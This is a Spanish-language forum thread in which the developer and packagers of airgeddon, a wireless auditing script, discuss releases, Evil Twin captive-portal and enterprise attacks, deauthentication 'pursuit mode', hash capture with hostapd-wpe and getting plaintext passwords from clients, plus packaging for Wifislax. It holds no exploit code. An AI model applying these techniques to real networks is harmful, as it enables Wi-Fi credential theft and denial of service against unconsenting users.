Publicado por: DEPREDADOR en 03-08-2018, 02:43 (Viernes)
Acabo de hacer un commit. Ahora en la ventana DoS pone en el título "(DoS Pursuit mode)" si se activó esta opción. Saludos.

amigo y habra alguna forma de poner este mismo ataque de modo perseguido a la herramienta linset para que asi si cambian el canal no deje de atacar.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 18-08-2018, 19:52 (Sábado)
Hola a todos!!! sigo vivo!! es q con lo del puto gdpr se me fue al carajo la cuenta! imagino q como a tantos otros... bueno, ya me registré de nuevo y sigo dando guerra con airgeddon. Perdonad la tardanza.

El otro día salió airgeddon v8.11 con traducciones al turco, algunos fixes y una cosa que os va a gustar. Ahora se puede usar cualquier tarjeta wifi que soporte modo monitor, indpendientemente de si es compatible con airmon. Hasta la versión v8.10 solo funcionaban con airgeddon las tarjetas que eran soportadas por airmon, pero ahora ya airgeddon puede cambiar el modo sin problemas, realizar los ataques evil twin, etc.

Por cierto, ya estoy trabajando en la v9.0 que tendrá mandangas para WAP/WPA2 enterprise.

P.D. desde que en kali y parrot sacaron el bettercap 2.x , se fue al carajo el ataque Evil Twin con BeEF y bettercap integrado. Así q hice un arreglo para que si tienes bettercap 2.x no soportado por airgeddon al menos te lo detecta y te lo dice. Te indica que sigas estos pasos del wiki para hacer un downgrade: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Bettercap%20Tips (https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Bettercap%20Tips) Espero que en Wifislax no se actualice bettercap a la 2.x porque el creador no está muy por la labor de colaborar pues no contesta ni a los mails para una posible integración. Por no tener, no tiene opción -v para ver la versión.

Saludos terrícolas!

Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 18-08-2018, 20:07 (Sábado)
Pues ahora mismo , en desarrollo , llevo bettercap 2.6 y he visto que acaba de salir 2.8
Título: Re:Script multiuso en bash, airgeddon
Publicado por: ampamer en 31-10-2018, 09:43 (Miércoles)
buenas, tengo una consulta estoy usando airgeddon que esta incluido en la iso testeo 05-10-2018  y ayer estuve haciendo pruebas, en mi red wifi, hize las pruebas en 2 adaptadores
el AWUS036NHV que tiene el chipset realtek 8188eus y tambien con  wifisky 2000mw que tiene el chipset Realtek 8187L y en ambos casos tengo problemas se abren las ventanas, pero no se crea el falso ap y el mensaje dice:  the hostpad was not started, eh intentado tanto en modo persecucion con 2 antenas y tambien con solo una para ver si era el problema, y en ambos casos tengo problemas de que no se puede realizar el ataque, mencionar que cuando utilizo mi tarjeta
pci TL-WN781ND que lleva un  chipset atheros el ataque se realiza de manera normal y funcionando bien, queria preguntar las tarjetas usb que mencione antes no son buenas para utilizarlas con este script?  desde ya agradecerte por el esfuerzo que haces y por el empeño que le pones.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 30-01-2019, 08:35 (Miércoles)
Hola, ayer se publicó al fin la versión 9 de airgeddon que incluye ataques para redes enterprise, cracking offline de hashes capturados en redes enterprise y el nuevo sistema de opciones que permite hacer un montón de personalizaciones en el script: saltarse la intro, quitar los colores, poner los chequeos de dependencias en modo silencioso, etc etc... todo ello con un fichero de configuración, también se puede tocar desde el menú de opciones o lanzando flags en el command line a la hora de llamar a airgeddon. Un link del wiki que explica como funciona esto, es muy sencillo: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Options

@ampamer, siento contestar con meses de retraso... acabo de verlo. Lo siento, pero no tengo info de esas tarjetas wifi y no podría decirte 100% nada seguro, pero en principio, si tus tarjetas son soportadas por airmon y fuera de airgeddon funcionan con los típicos comandos de airmon start y demás, no deberías tener ningún problema.

@USUARIONUEVO, estamos investigando como funciona bettercap 2.x para intentar darle soporte también. Parece que aunque no se pueda configurar en parámetros como antes, se puede crear un fichero de configuración y utilizarlo, por lo tanto tiene pinta de que se podrá integrar. Espero hacerlo en una versión próxima.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 11-02-2019, 23:43 (Lunes)
bueno , el paquete asleap , yo creo que si que esta de serie , de hecho a mi me sale version 2.2.

respecto a hostapd-wpe , acabo de hacer algo que parece que funcionara , ya que los ejecutables , se llaman distinto  (hostapd-wpe  hotabse-wpe_cli) y la ruta de ficheros .conf    /etc/hostapd-wpe/

con lo que no hay conflictos con el original hotapd y pueden coexistir.

voy a compilarlo y subirlo , para que se pruebe si funciona como deberia  o abria que ajustar algo , he seguido las instrucciones del git , aplicando el parche y tal , aunque las fuentes del hosapd-2.6 , yo tengo unas con todos los CVE , parcheados y sobre las que el parche wpe, funciona , asi que solo me queda subir el xzm , y que se pruebe  ;D
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 12-02-2019, 00:24 (Martes)
os dejo para que probeis los modulos de airgeddon 9.01  y  la dependencia hostapd-wpe

airgeddon
https://mega.nz/#!LxQiia4a!72S1k0AOfIvrWAh0a0Y5wU4QaQhY6BmYyzUJxaYzdro

hostapd-wpe
https://mega.nz/#!i4AAmaID!IWbBvcrUZn_-iLVGoPKDlCPVvcFEhotExmBh7rpFflY
Título: Re:Script multiuso en bash, airgeddon
Publicado por: trasto90 en 12-02-2019, 19:06 (Martes)
Hola,
No he probado versiones anteriores, solo la última.
Tengo algunas dudas.
Lo utilizo con 2 atheros 9271 y una 8187 en wifilax 4.12 final (32bits) Portal cautivo menú 7, después 9.  9271 como principal, segunda 9271 conectada a internet y 8187 como seguimineto del canal.

1. El script funciona bien o aparentemente bien pero haciendo pruebas veo algo raro en el Dos. La desautentificación comienza, escribe un par de lineas y se para. O escribe unas cuantas durante 10 minutos y se para. ¿Es normal? Lo digo porque hago pruebas desde mi móvil y me saca una o 2 veces y despues se para. Por lo que no consigo una buena experiencia, es dificil llegar a resultados ya que sigo conectado.

2. Al conectar a la línea clonada y aunque tengo una 9271 conectada a internet, el móvil siempre me dice que esta línea no tiene conexión a internet y no se guardará ( Xiaomi 5 )

3. He leído algo que al navegar si se visita alguna web sin ssl, si abrira pero con ssl no conectará. Veo imposible que alguien se conecte a una web sin ssl. La mayoria tienen google de inicio y ahora siempre es ssl https://google.es

4. Otro problema que me aparece es que al navegar con el navegador del móvil, el portal cautivo no aparece. La barra de progreso corre y se queda parada a 1/3. Tengo que decir que sin embargo aparece en notificaciones un mensaje de inicio de sesión impresionante pero si pierdo esta opción, solo me queda navegar y el portal no aparece.

5. He probado con un par de móviles y en los 2, el tamaño de las letras del mensaje pidiendo contraseña es extremadamente pequeño. Tambén el botón de enviar y demás. En uno de ellos aparece como si fuera versión de pc y aparece solo la parte de la izq.


6. Para hacer el seguimiento del canal tengo la 8187 pero ¿qué hace exactamente? ¿busca solo canal de cambio o el portal cautivo se cambia a esta tarjeta? Lo digo por orientar adecuadamente las 2 wifis o solo la principal.


Me he quedado impresionado por la petición de inicio de sesión en el móvil. Muy buen trabajo pero a mi no me funciona porque como digo aunque me saque un par de veces, después se vuelve a conectar o lo hago yo manualmente en mi linea buena.

Un saludo y gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: conc@ en 12-02-2019, 21:24 (Martes)
Hola de nuevo v1s1t0r y USUARIONUEVO como siempre felicitaros por el gran trabajo.
Soy el mismo anon que te comento el problema con asleap que sigue sin reconocermelo .
Intento instalarlo de toda manera que encuentro y no me varia el resultado.
Por eso paso mi problemilla aqui a ver si USUARIONUEVO me puede guiar un poquillo tambien.
Decir que no utilizo la ultima version de wifislax  creo estoy en la 64 1.1 qu es la que mejor me funciona.
Y tengo una pequeña pregunta para USUARIONUEVO , si incluyera la carpeta descomprimida de asleap en alguna como por ejemplo donde esta la de ettercap no lo reconoceria? O es una la tonteria mas grande que puedo hacer?
jejejeje
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 13-02-2019, 00:13 (Miércoles)
Hola de nuevo v1s1t0r y USUARIONUEVO como siempre felicitaros por el gran trabajo.
Soy el mismo anon que te comento el problema con asleap que sigue sin reconocermelo .
Intento instalarlo de toda manera que encuentro y no me varia el resultado.
Por eso paso mi problemilla aqui a ver si USUARIONUEVO me puede guiar un poquillo tambien.
Decir que no utilizo la ultima version de wifislax  creo estoy en la 64 1.1 qu es la que mejor me funciona.
Y tengo una pequeña pregunta para USUARIONUEVO , si incluyera la carpeta descomprimida de asleap en alguna como por ejemplo donde esta la de ettercap no lo reconoceria? O es una la tonteria mas grande que puedo hacer?
jejejeje

Los modulos son para wifislax64-2.0 , si estas en la 1.1 pues ese es el problema.

la 2.0 tiene asleap.

No voy a bajar la 1.1 ni crea un modulo asleap para la 1.1 ni nada parecido , asi que solo te queda "si quieres"  , poner la 2.0 en otro pincho usb y probar.

O intentar tu mismo compilar y empaquetar asleap ... que no recuerdo bien , pero si la 1.1 no lo lleva es por que no compilaba y alguna solucion encontre para la 2.0.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: conc@ en 14-02-2019, 20:54 (Jueves)
La cosa era aprenderlo yo y .... Conseguido lo e compilado, me lo reconoce y funciona.

Y hasta el momento todo ok.
No queria darte mas trabajo USUARIONUEVO era si me podias guiar a hacerlo yo y como decia compilarlo y meterlo en la carpeta adecuada. En este caso /usr/bin/.
Mi pregunta era si podia hacerlo asi solamente.
Gracias de nuevo a ti y v1s1t0r. Sois muy grandes. Seguir asi  y si os puedo ayudar en algo aqui teneis un humilde ayudante
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 16-02-2019, 07:43 (Sábado)
Hola USUARIONUEVO. He descargado el último Wifislax y estoy probando el módulo de airgeddon 9.01 que empaquetaste. Este módulo va bien, pero en el de hostapd-wpe fallan algunas cosas. Al levantar el Evil Twin Enterprise da error.

(https://i.ibb.co/h2V7FMr/error-hostapd-wpe.png) (https://ibb.co/QYMbvch)

Mirando el fichero de config que airgeddon genera, apreciamos algunas rutas a ficheros que parece que no se están creando:

(https://i.ibb.co/D458GYf/hostapdwpeconfig.png) (https://imgbb.com/)

Como puedes ver, si hacemos un ls en la carpeta del hostapd-wpe vemos esto:

(https://i.ibb.co/j5Qm3Qx/hostapdwpedir.png) (https://ibb.co/qncKmc4)

Es decir, que habría que hacer algunos pequeños cambios para que termine de funcionar. Creo que habría que renombrar (o copiar) el fichero "hostapd.eap_user" para que se llamara "hostapd-wpe.eap_user" y luego crear los 3 ficheros de certificados, que si no los tienes te los paso yo ya que en paquetes de otras distribuciones sí que vienen incluidos. Son unos ficheros de certificado de ejemplo. (Tengo pensado en futuras versiones que te permita crear certificados personalizados... pero bueno, esto no viene al caso ahora  ;D )

Por lo demás parece que todo bien. El módulo de airgeddon 9.01 bien. El asleap funciona, así para @anon ... solo tienes que ponerte el wifislax nuevo! y ya tendrás asleap funcionado de base, aunque ya leí q lo compilaste a mano y también te funcionó, pues perfecto... ahh y una última cosa. He visto que no está el módulo ccze en esta últilma versión de Wifislax. ¿Podrías añadirlo para la próxima junto con estos cambios? Como creo que ya comentamos en alguna ocasión, aunque no es necesario 100% para funcionar, airgeddon lo usa si detecta que está instalado y viene muy bien para colorizar algunas salidas como los ataques WPS o cuando descifras con hashcat o similares... si puedes hacer el favor de incluirlo estaría muy bien para que airgeddon funcionase a pleno rendimiento! Gracias!!

Para @trasto90 ... los Evil Twin funcionan muy bien y no se han tocado desde hace varias versiones. Por una parte tienes el tema del DoS del que poco te podemos decir... el DoS es una "ciencia" inexacta. Hay veces que funciona mejor y veces que funciona peor, hay clientes a los que les afecta y a otros les afecta menos... ciertos ataques van bien contra un AP y otros no, otros van mejor contra algunos clientes y otros mejor contra otros... si el cliente se cae pero luego recupera y no vuelve a caer lo único q puedo decirte es q pruebes otro ataque o pruebes con otra tarjeta. A mi me funcionan de lujo! También te puedo decir que pruebes la versión 9.10 que aún está en desarrollo en el github (en el branch dev) donde hemos cambiado mdk3 por mdk4. Puedes probar a ver si te va mejor pero vamos, que aquí poco podemos hacer. He visto que Wifislax ya tiene mdk4 instalado así que eso no será un problema.

Respecto a otras cosas que comentas... sí, es cierto que para que el portal cautivo funcione el cliente ha de hacer una petición http y no https. Dices que eso es casi imposible que pase, pero no es así... aunque hoy día ya casi todo vaya por https, la gente no escribe nunca en sus navegadores la dirección "https://www.google.com" o "https://www.trello.com" ... ellos escriben "google.com" o "trello.com" en la barra del navegador (y más desde un móvil desde el que es costoso escribir... escribes cuanto menos posible) y ahí sí que funcionará porq hace una petición primero a http://www.google.com o a http://www.trello.com y aunque de forma normal las páginas ya luego redirigen de forma automática a su versión https ya sea porque tienen la cabecera HSTS o por lo que sea, resulta que al menos una petición en plano se ha hecho, y el portal cautivo funcionará. Para hacer funcionar el portal cautivo directamente con una petición https harían falta un montón de cosas: un dominio comprado de internet, comprar un certificado legítimo acorde a ese dominio, y configurarlo en airgeddon claro está para usar todo esto. Esto es algo que no va a ocurrir pues bastante invierto en tiempo en el script como para invertir también en comprar certificados legítimos y demás... y la opción de poner un certificado autofirmado no es viable. Prefiero que no le funcione al usuario víctima y siga probando hasta que haga una petición http a que le salga un warning de que la página no es fiable por el certificado... eso sí que hará que la víctima no vaya a entrar. También está la opción de los conocidos certificados de LetsEncrypt que son gratuitos y son legítimos (de los buenos, de los que aparecen en verdecito  ;) ), lo que pasa es que aún así tendría que comprar un dominio para que me lo dieran y luego que solo duran 90 días... y estar todo el día actualizando esto puede ser un problema... yo si algún benefactor quiere comprar un certificado de 5 o 10 años lo implemento, no hay problema! registramos un dominio y pillamos el cert... pero sabemos que eso no va a pasar. Nadie nos queremos (y me incluyo) gastar la pasta en esto.

Respecto a eso que comentas de que la página del portal cautivo se ve pequeña... es porque la página se adapta al tamaño. Es imposible hacer que se vea 100% perfecta en todos los dispositivos. Ten en cuenta que hay un millón de tipos de móviles, pcs, pantallas, distintas resoluciones, etc... lo que hay no está nada mal porque es algo que funciona bastante bien en casi todos los dispositivos. Te instaría a que lo probases en otros dispositivos para que veas que seguramente se verá mejor que en el que lo estás probando. Y sí, el mensaje de inicio de sesión del móvil es la leche  >:( y no te preocupes porque a un usuario que busca internet desesperado no se le pasará.

También te digo que el portal cautivo no se cambia cuando haces el DoS pursuit mode. La segunda tarjeta escanea en segundo plano en busca del AP objetivo y si este cambiase de canal te avisa y re-lanza el DoS de nuevo para perseguirle, pero tu "chiringuito" del AP y portal no cambia.

Respecto a otra cosa que comentas de que tienes internet en un interfaz y airgeddon te dice que no tienes internet.... alguna estás liando me temo ya que el método de confirmar si hay internet en la tarjeta elegida funciona bien desde hace muuuuuuuuuuchas versiones... y lo único que mira es que tengas una ruta 0.0.0.0 en la tarjeta en cuestión, además de probar a conectar (creo que prueba contra github) para ver si hay conexión. Mira que no estés en un entorno de navegación restringida y que se pueda conectar bien a github y que los pings no estén capados en tu red, etc.

saludos!

Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-02-2019, 00:02 (Domingo)
Hola , veras , te comento , lo del fichero de config , es correcto.

He bajado y analizado el paquete que se usa en kali , y te comento cosas.

en /etc  , el paquete de kali contiene lo siguiente ...

FICHEROS CONFIG

/etc/hostapd-wpe/hostapd-wpe.conf
/etc/hostapd-wpe-wpe.eap_user

CARPETA

/etc/hostapd-wpe/certs

con lo que serian los ficheros para la generacion del server.key

Código: [Seleccionar]
/etc/hostapd-wpe/certs:
Makefile  README.wpe  ca.cnf      demoCA      xpextensions
README    bootstrap   client.cnf  server.cnf

Como ves , los ficheros que tu dices , no estan de serie , se generan usando el bootstrap , puedo generarlos y empaquetarlos, pero alguien que este en kali u archlinux "virgen"  , no van a tener tampoco los ficheros server.key y demas.

Como digo no es un drama en mi caso , por que los puedo generar y empaquetar , pero hay que andar con ojo , por que el bootstrap , necesitas ejecutarlo 4 o 5 veces hasta que genera el server.key  , y ya dice todo OK , creo que es por que el makefile , no tiene el orden correcto de generacion y hasta que va generando los ficheros va fallando varias veces hasta que acaba generandolos y ya da el ok.

una forma sencilla de ver lo que te digo es irte a /etc/hostapd-wpe/certs  y ejecutar el

Código: [Seleccionar]
make clean
eso borrara los ficheros generados durante su uso dejando solo los ficheros de serie (como si fuese el codigo fuente) , y veras que necesitas ejecutar el bootstrap varias veces hasta que dice serverOK.

AIRGEDDON , creo que deberia ver si tiene el fichero

if ! -f /etc/hostapd-wpe/certs/server.key then
while ... 

ya sabes si no esta el fichero , ejecutar bootstrap , hata generarlo ,... y despues continuar.

imagino esos cert y keys "caducaran" ?¿  , y por eso se empaqueta la carpeta certs , sin ficheros key.

Si tienes curiosidad , de aqui puedes bajar el paquete de kali
http://http.kali.org/pool/main/h/hostapd-wpe/

te voy a crear un xzm , exactamente como el deb de kali ...    desconozco como lo hara archlinux , pero imagino sera igual.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-02-2019, 00:07 (Domingo)
te dejo el xzm , con el mismo sistema de empaquetado que el de kali
https://mega.nz/#!S8xwmKyJ!m6LBWgdW-_jwXH6GLhVl4-rpiAdjwj8rK-4fD3DN2es

borrate el anterior y prueba con este

si lo instalaste a HDD , que lo dudo ...

Código: [Seleccionar]
removepkg hostapd-wpe
y despues click derecho en el nuevo xzm , instalar xzm.

y si es todo en live, pues borras el xzm anterior de hostapd-wpe y pones este version 2
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-02-2019, 10:53 (Domingo)
Hola, lo probaré. A ver si tengo un hueco luego.

Sí, he instalado una vm con Wifislax instalado en hdd. Siempre tengo una. Aunque yo suelo usar Parrot, pero me gusta tener diversas vm con los diferentes sistemas operativos q sirgeddon soporta. Gracias x las indicaciones porque si te digo la verdad no tenía ni idea de como se desinstalaba un paquete.  ^-^

Lo pruebo y os digo. Thanks por currarte el paquete.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-02-2019, 12:52 (Domingo)
Vale, ya llegué a casa y pude probarlo... recién instalado el nuevo paquete hostapd-wpe lanzas el ataque de airgeddon y falla. Es como dijiste, que parece que le faltan algunos ficheros. Si luego ejecutas a mano el bootstrap, los genera y al volver a lanzar el ataque ya funciona... así que no se... ¿no se podrían directamente meter los tres ficheros ca.pem server.pem y server.key ? así eviataríamos errores... ya se que como comentaste, quizán no vengan porque al tener caducidad, pues mejor que se generen en el momento y así tendrán un año desde el momento en que se generen... pero si por mi fuera, los generaría con caducidad de 10 años (3650 días) y lo empaquetaría ya con los tres ficheros de los certificados directamente. Esto se puede hacer fácilmente modificando el fichero ca.cnf y cambiando el 365 por 3650 y ejecutando el bootstrap para que se generen. No se si lo ves como una opción, pero ahorraría muchos problemas y preguntas de la gente.

Ahora mismo no sabría decirte si este problema también pasaría en un Kali o un Parrot, pero es algo que voy a probar. Voy a lanzar uno en live o haré una instalación nueva para ver si la primera vez que se lanza el ataque también falla o si estos paquetes gestionan esto de alguna manera para que al instalarlos se ejecute bootstrap al menos una vez... no estoy seguro pero lo voy a comprobar. No obstante, creo que la opción de crear el paquete con los ficheros ya generados directamente con 10 años de caducidad sería más que suficiente. Hago la prueba y vuelvo con los resultados.

P.D. por otra parte, se que esto ya lo hemos comentado alguna vez... igual en un msg privado, pero en todos los sistemas se invoca a airgeddon con el comando "airgeddon" y aquí es "airgeddon.sh". Se que es una chorrada, pero también está el hecho de que se está metiendo todos los ficheros de airgeddon en el /usr/bin , y eso es algo que bueno... no es lo mas correcto desde mi punto de vista. Antes igual sí porque solo había ficheros ejecutables... pero desde la versión 9 está el .airgeddonrc que es de configuración, y tener ficheros de configuración en /usr/bin no es la mejor de las prácticas. Creo que lo que se debería hacer es que todos los ficheros de airgeddon estén en una carpeta /opt/airgeddon o bien /usr/share/airgeddon o donde sea... y que lo que haya en /usr/bin sea un script que se llame "airgeddon" a secas que simplemente haga un cd al path donde estén los ficheros del script y luego el comando bash airgeddon.sh . Creo que ahora que estamos reestructurando cambios, podría ser una buena forma de empaquetar esta versión 9.01 ... o como ya la tienes empaquetada, si quieres para la siguiente que será la 9.10 y que espero sacar de aquí a un mes aprox.

Saludos!!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-02-2019, 20:11 (Domingo)
Pero el fichero de configuracion lo generas tu donde quieras, si esta en /usr/bin , es por que tu lo mandas alli en lugar de

Código: [Seleccionar]
$HOME/.airgeddonrc
La variable HOME esta en todos los sistemas definida ,ya que indica el usuario de sesion.

Respescto a lo otro , pues bueno , puedo generar los ficheros y tal , pero es que creo que en todas las distros te va a pasar eso , y lo comentaba por eso.

En los sistemas linux , se usan dos sitios para guardar configs ...

1 - Se diria que por defecto seria  /etc  , puede ser tambien  /etc/nombrePrograma/config
2 - En la ruta HOME , aqui la diferencia esta en que si por ejemplo tu tienes un config en /etc y luego otro en HOME , el HOME , mandaria sobre el otro en /etc que seria por asi decirlo el default.


Por eso a veces podras ver en un HOME , algun file de configuracion , por que no existia, o por que cambiaste algo en un programa en su config por defecto y salva los cambios en HOME , para preservar el de por defecto intacto.

---------------------------------------
Voy a generar el hostapd-wpe con los certificados y lo pongo aqui para por lo menos probar facil.

Cambiare el modo de ejecutar airgeddon , quitando el sh del final del nombre , lo demas va a estar todo igual , los configs , los debes manejar tu mismo , generandolos y manejandolos donde veas conveniente.

si son varios configs

Código: [Seleccionar]
$HOME/.airgeddon/CONFIGS

Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-02-2019, 20:27 (Domingo)
Pero el fichero .airgeddonrc debe estar donde esté airgeddon.sh y si vas a meter los ficheros en alguna carpeta, pues ahi debe estar... mira como lo hacen en parrot por ejemplo: https://dev.parrotsec.org/security-tools/airgeddon

Hay un fichero airgeddon "pelao" que es el q va a /usr/bin y luego los ficheros de airgeddon que son el .airgeddonrc además de los .sh y tal van a una carpeta /usr/share/airgeddon ... aquí puedes ver donde hace el deploy de cada cosa: https://dev.parrotsec.org/security-tools/airgeddon/blob/master/debian/install

Genial, pásame el hostapd-wpe con los certs y lo pruebo. Tengo pendiente aún probar en un Kali virgen a ver si en la primera vez que se lanza hostapd-wpe "explota" o si va a funcionar... ya tengo descargada la última iso para probarlo aunque sea en live... no obstante, así de memoria, creo recordar que tras instalarlo ejecuta el bootstrap como parte final de la instalación... pero tengo que confirmarlo. Gracias!!!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: conc@ en 17-02-2019, 20:30 (Domingo)
Hola amigos no se si puedo ayudaros con esto . Instale hostapd-wpe y a mi me funciona bien . Si os puedo ayudar puedo decir desde que enlace lo descargue e instale si os vale de algo.
Saludos
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-02-2019, 20:59 (Domingo)
Hola amigos no se si puedo ayudaros con esto . Instale hostapd-wpe y a mi me funciona bien . Si os puedo ayudar puedo decir desde que enlace lo descargue e instale si os vale de algo.
Saludos

lo que se esta probando es un ataque muy especifico , lo demas deberia funcionar bien.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-02-2019, 21:00 (Domingo)
Pero el fichero .airgeddonrc debe estar donde esté airgeddon.sh y si vas a meter los ficheros en alguna carpeta, pues ahi debe estar... mira como lo hacen en parrot por ejemplo: https://dev.parrotsec.org/security-tools/airgeddon

Hay un fichero airgeddon "pelao" que es el q va a /usr/bin y luego los ficheros de airgeddon que son el .airgeddonrc además de los .sh y tal van a una carpeta /usr/share/airgeddon ... aquí puedes ver donde hace el deploy de cada cosa: https://dev.parrotsec.org/security-tools/airgeddon/blob/master/debian/install

Genial, pásame el hostapd-wpe con los certs y lo pruebo. Tengo pendiente aún probar en un Kali virgen a ver si en la primera vez que se lanza hostapd-wpe "explota" o si va a funcionar... ya tengo descargada la última iso para probarlo aunque sea en live... no obstante, así de memoria, creo recordar que tras instalarlo ejecuta el bootstrap como parte final de la instalación... pero tengo que confirmarlo. Gracias!!!

meterlo todo a /usr/share , es casi lo mismo que lo de /opt  ,   puedo hacerlo.

airgeddon en bin , es solo un wrapper , que hace cd , a la carpeta y ejecuta lo que le digamos....tengo muchos empaquetados igual.

voy a estructurar eso y subo los dos
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-02-2019, 21:07 (Domingo)
ficheros nuevos

airgeddon   9.01-v2
https://mega.nz/#!W9JkzKoR!ah7GGGmoqeHEIGJjUWrdi_1RRZjkw5j9Nc-ILPkekaU

hostapd-wpe  v3
https://mega.nz/#!Oo4hlYrL!xqO8CRcxNk67WrArs6QJbPyWDmZWRn8D7FAZtEROJKk

removepkg airgeddon
removepkg hostapd-wpe

y despues click derecho sobre cada xzm  ,  autoinstalar.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-02-2019, 21:08 (Domingo)
el fichero de config hay que empaquetarlo o se genera el solo ??

.airgeddonrc

Bueno , ya veo que si , lo empaquete tambien en share/airgeddon  ;)

el v2 empaquetado de airgeddon ya lleva el config y esta todo con el wrapper a share.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-02-2019, 21:12 (Domingo)
Si no existe se generará solo, pero sí, se suele empaquetar, no cuesta nada. Lo suyo es que exista y esté en la misma carpeta que los .sh

Voy a descargar esto y a probarlo. Thanks!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-02-2019, 21:14 (Domingo)
Si no existe se generará solo, pero sí, se suele empaquetar, no cuesta nada. Lo suyo es que exista y esté en la misma carpeta que los .sh

Voy a descargar esto y a probarlo. Thanks!

Ok , acabo de cambiar el link de airgeddon , si pillaste la el primero que habia puesto como se genera no pasa nada, pero el link actual lleva empaquetado el config en share y el wrapper.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-02-2019, 21:32 (Domingo)
Wapísimo, funciona! a la primera... se levanta el ap de enterprise... todo parece ok. He visto que todo está ahora en /usr/shared/airgeddon ... perfect! una cosilla, el fichero known_pins.db aunque tiene esa extensión es un bash q se incluye usando un source desde otro fichero... no tiene permisos de ejecución, solo de lectura. Imagino que al incluirse desde un source funcionará igual... no lo he probado aún pero bueno, que imagino que así vale.

Por cierto, llegaste a compilar el paquete ccze? si lo tienes por ahi, lo puedes poner el link por aquí? es para instalármelo... que los ataques wps salen muy feos sin él  ;D

Como te lo curras macho!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-02-2019, 22:00 (Domingo)
Vale, acabo de probar lo del wps y funciona perfectamente... con que tenga permisos de lectura va bien. Es capaz de leer la base de datos de PINs WPS y todo funciona sin problemas.

Estaba haciendo algo de deeper testing... y pasa una cosa de la que no me había percatado... al principio pensaba q era un bug de airgeddon... pero no, es algo del hostapd-wpe . Normalmente (en Kali o Parrot por ejemplo), cuando capturas hashes, el hostapd-wpe los pinta en dos formatos, para john the ripper y para hashcat, y airgeddon parsea la salida del hostapd-wpe y te genera los ficheros en ambos formatos para que luego elijas como romperlo ya sea con asleap, hashcat o john the ripper... pero... he visto que en el hostapd-wpe de Wifislax SOLO salen los hashes en formato john the ripper... y por lo tanto airgeddon pues solo te genera el fichero en ese formato. Es decir, que falta que lo pinte en formato hashcat también.... ¿de donde sacaste el fuente de hostapd-wpe? porque creo que no es la última versión.

Pongo dos pantallazos para que se entienda lo que digo... el primer pantallazo es en Wifislax donde se ve un hash capturado y una contraseña en plano:

(https://i.ibb.co/3NLgJrT/wifislax1.png) (https://ibb.co/d2z8hWf)

Como veis, solo pinta el hash en formato John the ripper... pero el de hashcat no está... wtf? he visto que lanzando "hostapd-wpe -v" en Wifislax, dice que es versión 2.6, por si sirve de algo...

Aprovecho para explicar en el post como coger contraseñas en plano... si un client de móvil conecta a nuestra red falsa con las opciones por defecto, se capturará el hash. Sin embargo si se selecciona TTLS / PAP aparecerá la pass en plano.

Bueno que me lío xddddd....  ^-^ esto es una captura haciendo lo mismo en un Parrot, que tiene un hostapd-wpe versión 2.7 (igual ahí está la diferencia de que este sí que pinte los hashes en formato hashcat también)... pantallazo de la prueba:

(https://i.ibb.co/jZzrrqf/wifislax2.png) (https://ibb.co/PzM66Jj)

Habría que ver donde están los fuentes del hostapd-wpe 2.7 mejor que el 2.6

Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-02-2019, 22:15 (Domingo)
es que en el git de hostapd-wpe , es lo que hay , y las instrucciones son todo para el 2.6 , puede que el soporte hashcat , fuese implementado en el 2.7

sobre ccze

Código: [Seleccionar]
slapt-src -u
slapt-src -i ccze

tal vez deberia aparecer en los checks iniciales, aunque sea solo como opcional , asi otros desarrolladores podrian ver que si se busca es por alguna razon y si esta , abra opcionales activados en airgeddon.

voy a ponerlo en iso.


las sources de hostapd-wpe ,2.7  , creo que estaban en el link que te puse de kali , el file orig.tar.gz   , lo mirare a ver.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-02-2019, 22:24 (Domingo)
No se si servirá... pero parece que aquí están los fuentes de hostpad 2.7: https://w1.fi/hostapd/

En este enlace se descargan los fuentes: https://w1.fi/releases/hostapd-2.7.tar.gz

Lo que no se es si el patch de github de hostapd-wpe te valdrá para estos fuentes... espero que sí para que se pueda compilar esta versión.

Sorry por hacerte currar tantas veces, pero es que no me había fijado en ese pequeño detalle de que no pintaba los hashes de hashcat. Se que es una ****da... otra vez a compilar, otra vez la movida de los certs (bueno, eso igual ya te vale porque ya tienes los certs)... otra vez hacer el paquete... bueno, la parte buena es que no hay prisa ninguna... tú cuando puedas... no stress q esto es for fun! mil gracias como siempre. Y perdon por el repost!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-02-2019, 22:30 (Domingo)
